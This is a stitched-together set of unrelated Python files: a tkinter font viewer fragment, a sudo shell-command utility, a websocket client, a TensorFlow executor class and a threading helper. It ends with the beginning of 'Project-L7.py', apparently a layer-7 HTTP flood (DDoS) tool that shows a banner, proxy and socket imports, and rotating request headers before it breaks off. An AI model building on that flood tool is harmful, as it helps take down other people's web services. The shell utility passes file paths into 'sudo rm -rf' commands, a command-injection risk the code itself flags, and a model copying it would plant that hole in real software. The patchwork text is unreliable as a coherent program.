self.current_font = self.FONTS_FILTERED[0] # *********** CREATE WIDGETS *********** self.default_color = self.master.cget("bg") self.BG_COLOR_MONO = "#ADD8E6" self.BG_COLOR_NORMAL = self.default_color self.create_widgets() # *********** LIFT, GET FOCUS *********** self.master.lift() # move window to the top self.master.focus_force() @staticmethod def hide_console(): """hide console window""" if os.name == "nt": ctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 ) @staticmethod def read_json(file): """read json file, to dict""" try: with open(file) as json_file: data = json.load(json_file) except FileNotFoundError: 
data = {} return data @staticmethod def write_json(file, data): """write dict, to json file""" with open(file, "w") as json_file: # ensure_ascii -> False/True -> characters/u'type' json.dump(data, json_file, sort_keys=True, indent=4, ensure_ascii=False) def check_if_mono(self, fonts): """check fonts mono status with new window https://stackoverflow.com/questions/16115378/tkinter-example-code-for-multiple-windows-why-wont-buttons-load-correctly """ # get paths fonts_file_path = static_file_path("fonts", "fonts_status.json") fonts_dir_path = static_file_path("fonts", "") # read known fonts from json known_fonts_status = self.read_json(fonts_file_path) known_fonts_keys = list(known_fonts_status.keys()) # compare specified with known, and separate not checked not_checked_fonts = [] specified_fonts_status = {} for font_to_check in fonts: if not font_to_check in known_fonts_keys: not_checked_fonts.append(font_to_check) else: specified_fonts_status[font_to_check] = known_fonts_status[ font_to_check ] if not_checked_fonts: # iter through not checked self.new_window = Toplevel(self.master) test_app = FontsMonoCheck(self.new_window, not_checked_fonts) test_app.mainloop() test_app.cleanup() # append checked fonts to current known checked_fonts = test_app.fonts_mono_status specified_fonts_status = {**specified_fonts_status, **checked_fonts} # store updated dict to json updated_json = {**known_fonts_status, **checked_fonts} if not os.path.exists(fonts_dir_path): os.makedirs(fonts_dir_path) self.write_json(fonts_file_path, updated_json) return specified_fonts_status def on_closing(self): """handle application closing""" if messagebox.askokcancel("Quit", "Do you want to quit?"): self.master.destroy() self.master.quit() def bg_color(self, status): """get bg color depend on status""" if status: return self.BG_COLOR_MONO return self.BG_COLOR_NORMAL def perform_center_text(self, text): """perform text(font name), to fit main label""" # make some text manipulations if needed # no wrap 
for now; dynamic in main label main_font = font.Font(family=self.current_font, size=50, weight="normal") self.main_label.config(font=main_font, text=text) def entry_callback(self, event): """entries callback""" self.user_text = self.main_text_entry.get().strip() # ********* update main label ********* if self.user_text: main_text = self.user_text else: main_text = self.current_font self.perform_center_text(main_text) # set focus on other item self.left_listbox.focus() def filter_callback(self, event): """filter callback""" # ******** perform value ******** value = self.filter_entry.get() self.FILTER = str(value.strip().lower()) # ******** update filtered list ******** self.FONTS_FILTERED = self.filter_fonts(self.FONTS_TO_SHOW, self.FILTER) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) # ******** update widgets ******** # update total fonts label self.top_info_left_down.config(text=self.NUMBER_OF_FONTS) # ******** update listbox ******** self.clear_listbox() self.fill_listbox(self.FONTS_FILTERED) self.left_listbox.focus() @staticmethod def filter_fonts(fonts, filter_str): """filter list of fonts""" return [font for font in fonts if filter_str.lower() in font.lower()] def switch_font_mode(self): """switch sound mode""" self.FONTS_MODE = (self.FONTS_MODE + 1) % 3 if self.FONTS_MODE == 0: self.FONTS_TO_SHOW = self.ALL_FONTS elif self.FONTS_MODE == 1: self.FONTS_TO_SHOW = self.NORMAL_FONTS elif self.FONTS_MODE == 2: self.FONTS_TO_SHOW = self.MONO_FONTS # ******** update filtered list ******** self.FONTS_FILTERED = self.filter_fonts(self.FONTS_TO_SHOW, self.FILTER) self.NUMBER_OF_FONTS = len(self.FONTS_FILTERED) # ******** update widgets ******** self.top_info_left_down.config(text=self.NUMBER_OF_FONTS) # update mode label button_text = "{}\n{}".format(" mode ", self.FONTS_MODES_DICT[self.FONTS_MODE],) self.mode_button.config(text=button_text) # ******** update listbox ******** self.clear_listbox() self.fill_listbox(self.FONTS_FILTERED) def items_selected(self, event): 
""" handle item selected event https://www.pythontutorial.net/tkinter/tkinter-listbox/ """ # ********* get selected item ********* selected_index = self.left_listbox.curselection() if not selected_index: return None selected_item = self.left_listbox.get(selected_index) self.current_font = selected_item # print("[*] {}: {}".format(selected_index, selected_item)) # ********* update main label ********* if self.user_text: main_text = self.user_text else: main_text = selected_item self.perform_center_text(main_text) return None def clear_listbox(self): """clear fonts listbox""" self.left_listbox.delete(0, END) def fill_listbox(self, values): """fill fonts listbox""" for index, value in enumerate(values): self.left_listbox.insert(END, value) # check mono status if self.FONTS_MONOSPACE_STATUS[value]: self.left_listbox.itemconfig(index, bg="#9ae9f5") def switch_example_text(self): """switch example text to show on main label""" self.main_text_entry.delete(0, END) self.user_text = next(self.test_examples) self.main_text_entry.insert(0, self.user_text) self.perform_center_text(self.user_text) def create_widgets(self): """create widgets from dict object""" # ********* bind key event for master widget ********* self.main_frame = Frame(self.master) self.main_frame.pack(expand=YES, fill=BOTH, side=BOTTOM) # ********* listbox ********* self.left_listbox = Listbox(self.main_frame) self.left_listbox.pack(expand=NO, fill=BOTH, side=LEFT) self.left_scrollbar = Scrollbar(self.main_frame) self.left_scrollbar.pack(expand=NO, fill=BOTH, side=LEFT) self.fill_listbox(self.FONTS_TO_SHOW) self.left_listbox.config(yscrollcommand=self.left_scrollbar.set, width=0) self.left_scrollbar.config(command=self.left_listbox.yview) self.left_listbox.bind("<<ListboxSelect>>", self.items_selected) # ********* RIGHT FRAME ********* self.right_frame = Frame(self.main_frame) self.right_frame.pack(expand=YES, fill=BOTH, side=RIGHT) # right top info self.top_info = Frame(self.right_frame) 
self.top_info.pack(expand=NO, fill=X, side=TOP) # ********* mono-normal switch button ********* button_text = "{}\n{}".format(" mode ", self.FONTS_MODES_DICT[self.FONTS_MODE]) self.top_button_frame = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_button_frame.pack(expand=YES, fill=BOTH, side=LEFT) self.mode_button = Button( self.top_button_frame, font=self.MONO_FONT_INFO_UPPER, text=button_text, command=self.switch_font_mode, ) self.mode_button.pack(expand=YES, fill=X, side=TOP) # ********* example button ********* self.example_button = Button( self.top_info, font=self.MONO_FONT_INFO_UPPER, text="example", command=self.switch_example_text, ) self.example_button.pack(expand=YES, fill=BOTH, side=LEFT) # ********* number of fonts ********* self.top_info_left = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_info_left.pack(expand=YES, fill=BOTH, side=LEFT) self.top_info_left_up = Label( self.top_info_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="total fonts", ) self.top_info_left_up.pack(expand=YES, fill=X, side=TOP) self.top_info_left_down = Label( self.top_info_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="{}".format(self.NUMBER_OF_FONTS), ) self.top_info_left_down.pack(expand=YES, fill=X, side=BOTTOM) # ********* text entry ********* entries_size = 13 self.top_info_center_left = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_info_center_left.pack(expand=YES, fill=BOTH, side=LEFT) self.top_info_center_left_up = Label( self.top_info_center_left, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="text", ) self.top_info_center_left_up.pack(expand=YES, fill=X, side=TOP) self.top_info_center_left_entry_sv = StringVar() self.main_text_entry = Entry( self.top_info_center_left, width=entries_size, font=self.MONO_FONT_INFO_UPPER, textvariable=self.top_info_center_left_entry_sv, justify="center", ) self.main_text_entry.bind("<Return>", self.entry_callback) self.main_text_entry.pack(expand=YES, 
fill=X, side=BOTTOM) # ********* search entry ********* self.top_filter_frame = Frame(self.top_info, relief=self.RELIEF_TYPE) self.top_filter_frame.pack(expand=YES, fill=BOTH, side=LEFT) self.top_filter_label = Label( self.top_filter_frame, relief=self.RELIEF_TYPE, font=self.MONO_FONT_INFO_UPPER, text="search", ) self.top_filter_label.pack(expand=YES, fill=X, side=TOP) self.top_filter_sv = StringVar() self.filter_entry = Entry( self.top_filter_frame, width=entries_size, font=self.MONO_FONT_INFO_UPPER, textvariable=self.top_filter_sv, justify="center", ) self.filter_entry.bind("<Return>", self.filter_callback) self.filter_entry.pack(expand=YES, fill=X, side=BOTTOM) # ********* MAIN LABEL CONTENT ********* starting_font = self.FONTS_FILTERED[0] main_font = font.Font(family=starting_font, size=50, weight="normal") self.main_label = Label( self.right_frame, relief=self.RELIEF_TYPE, font=main_font, text=starting_font, ) self.main_label.pack(expand=YES, fill=BOTH, side=BOTTOM) # dynamically wrap text in label self.main_label.bind( "<Configure>", lambda x: self.main_label.config(wraplength=self.main_label.winfo_width()), ) return True if __name__ == "__main__": viewer()
system.py
import logging
import os
import subprocess
import sys
import threading
import time
import traceback
import re

logger = logging.getLogger(__name__)


def read_file(filename, ignore_error=False):
    """Read a text file and return a list of its lines, whitespace-stripped.

    :param filename: path of the file to read
    :param ignore_error: if True, log any read error and return whatever was
        collected (possibly an empty list) instead of re-raising
    :returns: list of stripped lines (empty on error when ignore_error=True)
    """
    output = []
    try:
        with open(filename, "r") as fh:
            for line in fh:
                output.append(line.strip())
    except Exception:
        logger.error(traceback.format_exc())
        if not ignore_error:
            raise
    return output


def write_file(filename, contents, mode="w", ignore_error=False):
    """Write an iterable of lines to a file, appending a newline to each.

    :param filename: path of the file to write
    :param contents: iterable of strings, one per output line
    :param mode: open() mode, e.g. "w" to overwrite or "a" to append
    :param ignore_error: if True, log any write error instead of re-raising
    """
    try:
        with open(filename, mode) as fh:
            for line in contents:
                fh.write(line)
                fh.write("\n")
    except Exception:
        logger.error(traceback.format_exc())
        if not ignore_error:
            raise


def remove_file(filename, recursive=False):
    """Delete a file (or, with recursive=True, a directory tree) via sudo rm.

    Errors are ignored; the rm runs with -f so missing paths are not fatal.
    NOTE(review): the path is interpolated into a shell command; double quotes
    in *filename* would break quoting — confirm callers never pass untrusted
    names.
    """
    if recursive:
        run_shell_command("rm -rf \"%s\"" % filename, use_sudo=True, ignore_error=True)
    else:
        run_shell_command("rm -f \"%s\"" % filename, use_sudo=True, ignore_error=True)


def get_pid_children(pid, recursive=False):
    """Return the child PIDs of *pid* as a list of strings (via ps --ppid).

    With recursive=True, descendants of each child are appended as well.
    """
    pidlist = run_shell_command("ps --ppid %s -o pid=" % pid,
                                ignore_error=True, log_error_as=None)[1]
    if not recursive:
        return pidlist
    # Iterate over a snapshot so extending pidlist below is safe.
    temp_list = [p for p in pidlist]
    for p in temp_list:
        pidlist.extend(get_pid_children(p, recursive=recursive))
    return pidlist


def kill_pid(pid, signal="15", children=False, recursive=False):
    """Send *signal* (default SIGTERM) to *pid*, optionally to its children too.

    :param children: also signal direct children of *pid*
    :param recursive: with children=True, signal all descendants
    """
    pidlist = [str(pid)]
    if children:
        pidlist.extend(get_pid_children(pid, recursive=recursive))
    run_shell_command("kill -s %s %s" % (signal, " ".join(pidlist).strip()),
                      use_sudo=True, log_cmd_as=logging.INFO)


def run_background_command(command, use_sudo=False, sudo_user="root",
                           sudo_login=False, log_cmd_as=logging.DEBUG):
    """Launch *command* detached, discarding its stdout/stderr.

    NOTE(review): use_sudo/sudo_user/sudo_login are accepted but currently
    ignored (no sudo prefix is applied, unlike run_shell_command) — confirm
    whether callers rely on this before wiring them up.
    """
    logger.log(log_cmd_as, "Executing background command: %s" % command)
    subprocess.Popen(command, stdout=subprocess.DEVNULL,
                     stderr=subprocess.DEVNULL)


class CommandFailureError(Exception):
    """Raised when a shell command exits with a non-zero return code."""

    def __init__(self, cmd):
        msg = "Command failed: %s" % cmd
        super().__init__(msg)


class CommandTimeoutError(Exception):
    """Raised when a shell command does not finish within the timeout."""

    def __init__(self, cmd):
        msg = "Command timed out: %s" % cmd
        super().__init__(msg)


def run_shell_command(command, cmd_input=None, use_sudo=False, sudo_user="root",
                      sudo_login=False, timeout=480, ignore_error=False,
                      log_error_as=logging.WARN, log_cmd_as=logging.DEBUG,
                      output_to_file=False, mask_text=(), use_stdout=False,
                      pidfile=None):
    """Run a shell command, capture its output, and enforce a timeout.

    :param command: command string, executed with shell=True
    :param cmd_input: optional iterable of lines fed to the command's stdin
    :param use_sudo: prefix the command with "sudo -n" (plus -u/-i as needed)
    :param sudo_user: user for sudo -u when not root
    :param sudo_login: add sudo -i to create a login shell
    :param timeout: seconds to wait before killing the process tree
    :param ignore_error: if True, do not raise on non-zero return code
    :param log_error_as: log level for failure output, or None to suppress
    :param log_cmd_as: log level for the "Executing command" line
    :param output_to_file: if True, return the output file path instead of the
        lines; the caller then owns reading and deleting that file
    :param mask_text: regex patterns replaced with "xxxx" in logged commands
        (tuple default: never mutated, avoids the shared-mutable-default trap)
    :param use_stdout: if True, stream output to sys.stdout instead of a file
    :param pidfile: optional path into which the child's PID is written
    :returns: tuple (returncode, output) where output is a list of lines, or
        the output file name when output_to_file=True
    :raises CommandTimeoutError: if the command exceeds *timeout* seconds
    :raises CommandFailureError: on non-zero exit unless ignore_error=True
    """
    # Per-call scratch files; pid + timestamp keeps concurrent processes apart.
    outfile_name = "/tmp/bdg-%s-%s-out.txt" % (os.getpid(), int(time.time()))
    outfile = open(outfile_name, "w")
    if cmd_input is not None:
        infile_name = "/tmp/bdg-%s-%s-in.txt" % (os.getpid(), int(time.time()))
        infile = open(infile_name, "w")
        for line in cmd_input:
            infile.write(line + "\n")
        infile.close()
        # Reopen for reading so Popen can use it as stdin.
        infile = open(infile_name, "r")
    else:
        infile_name = None
        infile = None

    # Build the loggable form of the command with secrets masked out.
    log_command = command
    for text in mask_text:
        log_command = re.sub(text, "xxxx", log_command)
    log_command_full = log_command

    if use_sudo:
        sudo_prefix = "sudo -n"  # General prefix: no password prompt
        if sudo_user != "root":
            sudo_prefix = sudo_prefix + " -u '%s'" % sudo_user  # Add "-u username"
        if sudo_login:
            sudo_prefix = sudo_prefix + " -i"  # Add -i to create login shell
        command = sudo_prefix + " " + command
        log_command_full = sudo_prefix + " " + log_command

    logger.log(log_cmd_as, "Executing command: " + log_command_full)
    if use_stdout:
        stdout = sys.stdout
    else:
        stdout = outfile
    proc = subprocess.Popen(command, stdin=infile, stdout=stdout,
                            stderr=subprocess.STDOUT, shell=True)
    if pidfile is not None:
        with open(pidfile, "w") as f:
            f.write("{}".format(proc.pid))

    # Run communicate() in a thread so we can bound the wait with join(timeout).
    thread_proc = threading.Thread(target=proc.communicate)
    thread_proc.start()
    thread_proc.join(timeout)

    if thread_proc.is_alive():
        # Timed out: kill the whole process tree, salvage output, and raise.
        logger.error("Timed out (%d seconds) waiting for command to complete: %s"
                     % (timeout, log_command_full))
        try:
            kill_pid(proc.pid, children=True, recursive=True)
        except Exception:
            logger.warning(traceback.format_exc())
            logger.warning("Failed to kill process %d and/or its children" % proc.pid)
        outfile.close()
        if infile:
            infile.close()
            os.remove(infile_name)
        cmd_result = read_file(outfile_name, ignore_error=True)
        os.remove(outfile_name)
        logger.info("Output of timed out command: %s" % cmd_result)
        raise CommandTimeoutError(log_command)

    outfile.close()
    if infile:
        infile.close()
        os.remove(infile_name)

    if output_to_file:
        # caller will be responsible for reading and deleting this file
        cmd_result = outfile_name
    else:
        cmd_result = read_file(outfile_name, ignore_error=True)
        os.remove(outfile_name)

    if proc.returncode != 0:
        if log_error_as is not None:
            logger.log(log_error_as, "Return code %d: %s"
                       % (proc.returncode, log_command_full))
            if (not output_to_file) and (len(cmd_result) > 0):
                logger.log(log_error_as, "Ouput: %s" % str(cmd_result))
        if not ignore_error:
            # Short outputs are informative enough to use as the message;
            # otherwise fall back to the (masked) command line.
            if len(cmd_result) > 0 and len(cmd_result) < 4:
                raise CommandFailureError("; ".join(cmd_result))
            else:
                raise CommandFailureError(log_command)
    return proc.returncode, cmd_result
generic_websocket.py
"""
Module used as an interface to describe a generic websocket client
"""

import asyncio
import websockets
import socket
import json
import time

from threading import Thread, Lock
from pyee import AsyncIOEventEmitter

from ..utils.custom_logger import CustomLogger

# websocket exceptions
from websockets.exceptions import ConnectionClosed, InvalidStatusCode


class AuthError(Exception):
    """
    Thrown whenever there is a problem with the authentication packet
    """
    pass


def is_json(myjson):
    """Return True if the given string parses as valid JSON, else False."""
    try:
        json.loads(myjson)
    except ValueError:
        return False
    return True


class Socket():
    """Book-keeping wrapper around one websocket connection and its state."""

    def __init__(self, sId):
        self.ws = None                # underlying websocket, set once connected
        self.isConnected = False
        self.isAuthenticated = False
        self.id = sId
        self.lock = Lock()            # serializes concurrent send() calls

    def set_connected(self):
        self.isConnected = True

    def set_disconnected(self):
        self.isConnected = False

    def set_authenticated(self):
        self.isAuthenticated = True

    def set_unauthenticated(self):
        self.isAuthenticated = False

    def set_websocket(self, ws):
        self.ws = ws

    async def send(self, data):
        # NOTE(review): this is a threading.Lock held across an await; a slow
        # send could stall the event loop — confirm this is intended.
        with self.lock:
            await self.ws.send(data)


def _start_event_worker():
    """Default event-emitter factory used when none is injected."""
    return AsyncIOEventEmitter()


class GenericWebsocket:
    """
    Websocket object used to contain the base functionality of a websocket.
    Includes an event emitter and a standard websocket client.
    """
    logger = CustomLogger('BfxWebsocket', logLevel="DEBUG")

    def __init__(self, host, logLevel='INFO', max_retries=5,
                 create_event_emitter=None):
        self.host = host
        self.logger.set_level(logLevel)
        # override 'error' event to stop it raising an exception
        # self.events.on('error', self.on_error)
        self.ws = None
        self.max_retries = max_retries  # 0 means retry forever
        self.attempt_retry = True
        self.sockets = {}
        # factory for the event emitter (injectable for testing)
        create_ee = create_event_emitter or _start_event_worker
        self.events = create_ee()

    def run(self):
        """
        Start the websocket connection. This function spawns the initial
        socket thread and connection.
        """
        self._start_new_socket()
        # If no event loop is already running here, block the calling thread
        # so the daemon socket thread keeps the process alive.
        event_loop = asyncio.get_event_loop()
        if not event_loop or not event_loop.is_running():
            while True:
                time.sleep(1)

    def get_task_executable(self):
        """
        Get the run-indefinitely asyncio task
        """
        return self._run_socket()

    def _start_new_async_socket(self):
        # Each socket thread owns its own event loop.
        loop = asyncio.new_event_loop()
        loop.run_until_complete(self._run_socket())

    def _start_new_socket(self, socketId=None):
        # Use an explicit None check: socket id 0 is a valid, falsy id.
        if socketId is None:
            socketId = len(self.sockets)
        worker = Thread(target=self._start_new_async_socket)
        worker.start()
        return socketId

    def _wait_for_socket(self, socket_id):
        """
        Block until the given socket connection is open
        """
        while True:
            sock = self.sockets.get(socket_id, False)
            if sock:
                if sock.isConnected and sock.ws:
                    return
            time.sleep(0.01)

    def get_socket(self, socketId):
        """Return the Socket wrapper registered under the given id."""
        return self.sockets[socketId]

    def get_authenticated_socket(self):
        """Return the first authenticated socket, or None if there is none."""
        for socketId in self.sockets:
            if self.sockets[socketId].isAuthenticated:
                return self.sockets[socketId]
        return None

    async def _run_socket(self):
        """Connect, pump messages, and reconnect with retry accounting."""
        retries = 0
        sId = len(self.sockets)
        s = Socket(sId)
        self.sockets[sId] = s
        # max_retries == 0 means retry indefinitely.
        while self.max_retries == 0 or (retries < self.max_retries
                                        and self.attempt_retry):
            try:
                async with websockets.connect(self.host) as websocket:
                    self.sockets[sId].set_websocket(websocket)
                    self.sockets[sId].set_connected()
                    self.logger.info("Websocket connected to {}".format(self.host))
                    retries = 0
                    while True:
                        # optimization - wait 0 seconds to force the async queue
                        # to be cleared before continuing
                        await asyncio.sleep(0)
                        message = await websocket.recv()
                        await self.on_message(sId, message)
            except (ConnectionClosed, socket.error, InvalidStatusCode) as e:
                self.sockets[sId].set_disconnected()
                if self.sockets[sId].isAuthenticated:
                    self.sockets[sId].set_unauthenticated()
                self._emit('disconnected')
                if (not self.attempt_retry):
                    return
                self.logger.error(str(e))
                retries += 1
                # wait 5 seconds before retrying
                self.logger.info("Waiting 5 seconds before retrying...")
                await asyncio.sleep(5)
                self.logger.info("Reconnect attempt {}/{}".format(
                    retries, self.max_retries))
        self.logger.info("Unable to connect to websocket.")
        self._emit('stopped')

    async def stop(self):
        """
        Stop all websocket connections
        """
        self.attempt_retry = False
        for sock in self.sockets.values():
            await sock.ws.close()
        self._emit('done')

    def remove_all_listeners(self, event):
        """
        Remove all listeners from event emitter
        """
        self.events.remove_all_listeners(event)

    def on(self, event, func=None):
        """
        Add a new event to the event emitter
        """
        # Without func this acts as a decorator factory (pyee convention).
        if not func:
            return self.events.on(event)
        self.events.on(event, func)

    def once(self, event, func=None):
        """
        Add a new event to only fire once to the event emitter
        """
        if not func:
            return self.events.once(event)
        self.events.once(event, func)

    def _emit(self, event, *args, **kwargs):
        # isinstance (not exact type match) so Exception subclasses are
        # logged before being emitted as events.
        if isinstance(event, Exception):
            self.logger.error(event)
        self.events.emit(event, *args, **kwargs)

    async def on_error(self, error):
        """
        On websocket error print and fire event
        """
        self.logger.error(error)

    async def on_close(self):
        """
        This is used by the HF data server.
        """
        await self.stop()

    async def on_open(self):
        """
        On websocket open
        """
        pass

    async def on_message(self, socket_id, message):
        """
        On websocket message.

        Signature matches the internal call site in _run_socket
        (`self.on_message(sId, message)`); subclasses override this.
        """
        pass
executor.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Executor for eager execution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python import pywrap_tensorflow class Executor(object): """A class for handling eager execution. The default behavior for asynchronous execution is to serialize all ops on a single thread. Having different `Executor` objects in different threads enables executing ops asynchronously in parallel: ```python def thread_function(): executor = executor.Executor(enable_async=True): context.set_executor(executor) a = threading.Thread(target=thread_function) a.start() b = threading.Thread(target=thread_function) b.start() ``` """ def __init__(self, enable_async): self._enable_async = enable_async self._handle = pywrap_tensorflow.TFE_NewExecutor(enable_async) def __del__(self): try: pywrap_tensorflow.TFE_ExecutorWaitForAllPendingNodes(self._handle) pywrap_tensorflow.TFE_DeleteExecutor(self._handle) except TypeError: # Suppress some exceptions, mainly for the case when we're running on # module deletion. Things that can go wrong include the pywrap module # already being unloaded, self._handle. no longer being # valid, and so on. Printing warnings in these cases is silly # (exceptions raised from __del__ are printed as warnings to stderr). 
pass # 'NoneType' object is not callable when the handle has been # partially unloaded. def is_async(self): return self._enable_async def handle(self): return self._handle def wait(self): pywrap_tensorflow.TFE_ExecutorWaitForAllPendingNodes(self._handle)
Ship.py
import logging
from multiprocessing import Process, Manager
from threading import Thread
import traceback


class Ship(object):
    """
    A Ship is used to process a function that would otherwise stall a User
    Interface or is okay to work in the background. The process is run and
    then stored within the ship's container (self.container) which is a
    python dictionary. Errors are also grabbed and stored for reference
    later. Functions must return something that can be stored within a
    Python Dictionary.

    Attributes:
        ship_id: String/Int. The name of the ship.
        processing_type: String. Type of processing to occur.
        processing_types: String List. The available processing_types.
            (NOTE: MultiProcessing is faster but more temperamental,
            especially if Thread Locks are held within modules)
    """

    processing_types = ['thread', 'multiprocessing']

    def __init__(self, ship_id, processing_type='thread'):
        self.ship_id = ship_id
        self.container = {}
        # validates the type eagerly so a bad value fails here, not at sail
        self.process_type = self.check_process_type(processing_type)

    def set_sail(self, function, kwarg_dict, daemon=True):
        """
        Starts processing the function. Args are passed as a keyword args
        dictionary.

        Args:
            function: The Function to run. CANNOT BE PASSED AS LAMBDA.
            kwarg_dict: Dictionary of the keyword arguments of function.
            daemon: Boolean. Only used if using processing_type thread.
                (Recommended True)
        """
        self.set_processing_variables(function=function,
                                      kwarg_dict=kwarg_dict,
                                      daemon=daemon)
        self.voyage.start()

    def rejoin_port(self):
        """Called to rejoin the current process after job completion and data saved."""
        self.voyage.join()

    def storage_wrap(self, _passed_function, kwarg_dict, container):
        """Wraps the function in a method that stores the result/error within
        the ship's container dict."""
        try:
            result = _passed_function(**kwarg_dict)
        except Exception as e:
            # store both the short reason and the full trace so callers can
            # surface either one later
            result = {"Error Type": type(e).__name__,
                      "Traceback": traceback.format_exc().splitlines()[-1],
                      "Full Trace": traceback.format_exc()}
        container[self.ship_id] = result

    def set_processing_variables(self, function, kwarg_dict, daemon=True):
        """Sets the appropriate processing type and passes on to the storage wrap.

        Raises:
            ValueError: if self.process_type is not a supported type.
        """
        if self.process_type == 'thread':
            self.container = {}
            self.voyage = Thread(target=self.storage_wrap,
                                 kwargs=self.create_process_kwargs(
                                     function=function, kwarg_dict=kwarg_dict),
                                 daemon=daemon)
        elif self.process_type == 'multiprocessing':
            # a Manager dict is shared across the process boundary, unlike a
            # plain dict
            self.container = Manager().dict()
            self.voyage = Process(target=self.storage_wrap,
                                  kwargs=self.create_process_kwargs(
                                      function=function, kwarg_dict=kwarg_dict))
        else:
            # FIX: previously raised ValueError("Unknown Process Type %s",
            # process_type), which referenced an undefined name (NameError)
            # and never formatted the message.
            raise ValueError("Unknown Process Type %s" % self.process_type)

    def create_process_kwargs(self, function, kwarg_dict):
        """Utility Function for passing to storage method"""
        return {'_passed_function': function,
                'kwarg_dict': kwarg_dict,
                'container': self.container}

    def check_process_type(self, process_type):
        """Validates the requested processing type, returning it unchanged.

        Raises:
            ValueError: if process_type is not one of self.processing_types.
        """
        if process_type in self.processing_types:
            return process_type
        # FIX: format the value into the message instead of passing it as a
        # second exception argument (which produced a tuple-looking message).
        raise ValueError("%s Process Type is Not Supported" % process_type)
Project-L7.py
# -*- coding: utf-8 -*- #!/usr/bin/python3 import requests import socket import socks import time import random import threading import sys import ssl import datetime print(''' ▄███████▄ ▄████████ ▄████████ ▄███████▄ ▄████████ ▄████████ ▄████████ ███▄▄▄▄ ████████▄ ▄██████▄ ▄████████ ▄█ ▄████████ ███ ▄████████ ████████▄ ███ █▄ ▄████████ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ▀███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ ▀███▀▀██ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ▄███▄▄▄▄██▀ ▄███▄▄▄ ███ ███ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ▀ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ▀█████████▀ ▀▀███▀▀▀▀▀ ▀▀███▀▀▀ ▀█████████▀ ▀███████████ ▀▀███▀▀▀▀▀ ▀███████████ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀ ███ ▀███████████ ███ ▀███████████ ███ ███ ███ ███ ▀▀███▀▀▀ ███ ▀███████████ ███ █▄ ███ ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███ ███ ███ ███ ▀ ███ ███ ███ ███ ███ ▄████▀ ███ ███ ██████████ ▄████▀ ███ █▀ ███ ███ ███ █▀ ▀█ █▀ ████████▀ ▀██████▀ ██████████ █████▄▄██ ███ █▀ ▄████▀ ███ █▀ ▀██████▀▄█ ████████▀ ██████████ ███ ███ ███ ███ ▀ ''') time.sleep(1) print(''' ╔╗ ╦ ╦ ╔═╗╔╦╗╔═╗╦═╗╔╗╔╔═╗╦ ╔╦╗╔═╗╔╦╗╔═╗╔╗╔ ╠╩╗╚╦╝ ║╣ ║ ║╣ ╠╦╝║║║╠═╣║ ║║║╣ ║║║║ ║║║║ ╚═╝ ╩ ╚═╝ ╩ ╚═╝╩╚═╝╚╝╩ ╩╩═╝ ═╩╝╚═╝╩ ╩╚═╝╝╚╝ ''') acceptall = [ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n", "Accept-Encoding: gzip, deflate\r\n", "Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n", "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n", "Accept: 
application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n", "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n", "Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n", "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n," "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n", "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n", "Accept: 